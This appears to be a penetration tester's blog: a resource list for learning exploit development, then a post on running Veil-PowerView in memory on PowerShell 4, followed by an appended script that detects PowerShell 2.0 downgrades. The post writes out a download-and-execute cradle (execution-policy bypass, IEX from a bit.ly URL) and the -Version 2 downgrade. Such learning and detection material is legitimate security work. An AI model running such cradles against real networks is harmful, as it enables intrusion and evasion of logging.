Jumping into exploit development

I have done a little bit of exploit development over the years, starting with stack overflows, reading Hacking: The Art of Exploitation and The Shellcoder's Handbook Second Edition, and some CTF-related stuff, but I really had let my skills fall stale in the last few years. I went seeking out resources to freshen up my knowledge and found that they were spread out all over the place. So I figured why not put them all together for anybody looking to refresh their memory or just get started learning. I feel that a fundamental understanding of exploit development, at the very least enough to make modifications to public exploits, is necessary for anybody seeking a career in penetration testing. Also it's just downright fun to play around in a debugger.

Books

A couple of books that I referenced above that got me started and can give you a great foundation:

  • Hacking: The Art of Exploitation
  • The Shellcoder's Handbook, 2nd Edition

Shellcode

You're going to need to learn some assembly to understand what you are seeing in the debugger and also for writing your own custom shellcode:

A great place to start is securitytube.net, which offers a great class on assembly language.

Securitytube Windows assembly language megaprimer can be found here 

Securitytube Linux assembly language megaprimer can be found here

You can then follow this up with the Securitytube buffer overflow for Linux megaprimer here

The Shellcoder's Handbook serves as a great resource, which you can buy from Amazon.

Shellcoding for Linux and Windows tutorials can be found here

The project shellcode tutorials can be found here

Windows exploitation

Of course, first and foremost, @corelanc0d3r has some excellent material you can find here

FuzzySecurity has some great stuff as well here

OpenSecurityTraining (@opensectraining) offers a great wealth of information on the topic here

OpenSecurityTraining also has a video series to accompany some of the topics that I found very useful here

A wiki on Metasploit that has some great info can be found here

A great @metasploit post about stack overflows that is very detailed can be found here

The Grey Corner posts some detailed material:

  • Stack based overflows here
  • SEH stack based overflows here

Linux exploitation

FuzzySecurity also offers material on Linux exploit development here

Corelan does the same with his Linux exploit material here

Exploit databases

Exploit databases can be a great place to see already working and public exploit code. Taking a look at code and understanding it can be a big step towards writing your own successful exploit code.

Some sites to find exploit code:

@exploitdb, run by Offensive Security (@offsectraining), here

@Rapid7 provides some good information, including available modules for Metasploit, here

There are probably many more good resources out there, so feel free to tweet me. I love to post resources that have helped me so people can find good material, so you will probably see a lot of that on this blog. I hope this list grows as people give me suggestions.

Running Veil-Powerview on Windows 8.1 + Server 2012

I ran into a little problem when attempting to run Veil-PowerView on a Windows 8.1 box running PowerShell version 4, which also included some issues with running shells remotely. I just wanted to share my findings. Not anything astounding, but I hope I can save somebody some time. I wanted to run PowerView in memory by pulling it down from the web as shown in the @harmj0y article here. The command is as follows:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/1mYPUO4'); Invoke-NetView -Ping | Out-File -Encoding ascii netview.txt"

(screenshot: PowerView error)

But PowerShell doesn't seem too happy at all and vomits errors all over my screen. The error states that you need to add the -Version 2 option. Let's have a go and see if it works:

(screenshot: fix)

After that PowerView goes about its merry way, but this is just running it on a local machine in front of me. Nothing mind-blowing here, but I did a little further research to discover how to do this when running a remote session and found this TechNet article. I'm going to continue looking into this and possibly script something up to assist with running post-exploitation tools on clients running PowerShell 4.

Update:

So I reported the error to @harmj0y and he has added a warning to Veil-PowerView to make sure everybody knows to add -Version 2. It's shown here:

(screenshot: warning added to Veil-PowerView by harmj0y)

I’m going to do more research to see if this argument can be forced in some way.
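The -Version 2 switch above starts the legacy PowerShell 2.0 engine under a newer host, and that engine start is also what a defender looks for on a PowerShell 4 box. As an added example that is not part of the original post, this script reads the classic "Windows PowerShell" event log for engine starts (event ID 400) whose EngineVersion field is 2.x; it assumes the current session can read that log and that the look-back window in days is the only parameter.

```powershell
# Added example (not from the original post): report PowerShell 2.0 engine
# starts recorded in the classic "Windows PowerShell" log. Event ID 400
# ("Engine state is changed from None to Available") is written every time
# an engine starts; its message is a list of Key=Value lines, including
# EngineVersion and HostApplication (the launching command line).
# Assumes the session may read the log (local admin or Event Log Readers).
param(
    [int]$Days = 7   # look-back window; constructed default, adjust as needed
)

$since = (Get-Date).AddDays(-$Days)

$engineStarts = Get-WinEvent -FilterHashtable @{
    LogName   = 'Windows PowerShell'
    Id        = 400
    StartTime = $since
} -ErrorAction SilentlyContinue

$downgrades = foreach ($evt in $engineStarts) {
    # Parse the Key=Value lines of the event message into a hashtable.
    $fields = @{}
    foreach ($line in ($evt.Message -split "`r?`n")) {
        if ($line -match '^\s*(\w+)=(.*)$') {
            $fields[$Matches[1]] = $Matches[2].Trim()
        }
    }

    # Only the legacy engine is of interest; newer engines are normal here.
    if ($fields['EngineVersion'] -like '2.*') {
        [pscustomobject]@{
            Time            = $evt.TimeCreated
            EngineVersion   = $fields['EngineVersion']
            HostName        = $fields['HostName']
            HostApplication = $fields['HostApplication']   # e.g. a "-Version 2" launch
        }
    }
}

if ($downgrades) {
    Write-Warning ("{0} PowerShell 2.0 engine start(s) since {1}" -f @($downgrades).Count, $since)
    $downgrades | Sort-Object Time | Format-Table -AutoSize
} else {
    Write-Output "No PowerShell 2.0 engine starts found since $since"
}
```

The HostApplication column shows the full command line that launched the engine, so a -Version 2 run of the cradle above appears with its download URL intact.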